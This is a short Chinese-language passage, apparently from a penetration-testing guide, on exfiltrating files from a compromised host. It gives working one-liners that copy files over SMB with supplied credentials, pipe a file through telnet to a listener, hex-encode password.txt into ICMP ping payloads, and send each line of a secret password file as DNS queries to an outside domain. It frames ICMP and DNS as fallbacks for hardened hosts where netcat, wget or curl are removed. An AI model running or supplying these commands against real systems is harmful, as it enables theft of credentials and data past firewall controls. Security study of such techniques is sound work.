netcat/curl/wget/smb/icmp ping -p/dns/telnet

 

通过SMB协议，在目标服务器和主机之间建立网络共享连接，然后将目标服务器上的文件做分享，接着就可以在主机端将分享的文件copy下来啦。操作的命令如下，

net use h: \\xxx.xxx.xxx.xxx\web /user:{username} {password} && copy {File to Copy} h:\{filename}.txt

如果telnet客户端是在远程服务器上，那么我们可以利用这个条件传输一个文件到主机的监听器上，通过以下操作命令，

telnet xxx.xxx.xxx.xxx {port} < {file to transfer}

ICMP

如果你针对的目标主机已经被加固，有的工具诸如netcat, wget 或者CURL已经被移除。那对于数据库下载来说，虽然有难度，但是还是有另外的一些技术可以用的。首先，尝试让这主机ping你的机器，然后看ICMP报文是否被防火墙过滤，如果没有被过滤，而主机底层系统又是Linux的话，我们就能够将数据通过ICMP echo请求，使用“ –p flag”来进行传输文件。

首先，我们需要将文件转换为十六进制，然后将数据插入到数据包中。这个可以通过下面的例子认识下，

cat password.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xxx.xxx.xxx.xxx; done

跟ping命令的原理相似， DNS也能被用来进行数据库下载。这次我们将用每行数据作为一个DNS查询的主机名。通过监测网络流量，可以在我们的机器上重组数据包，还原原始文件。在这个实例中，下面的命令将作为我们请求部分提交给服务器。

cat /data/secret/password.txt | while read exfil; do host $exfil.contextis.com 192.168.107.135; done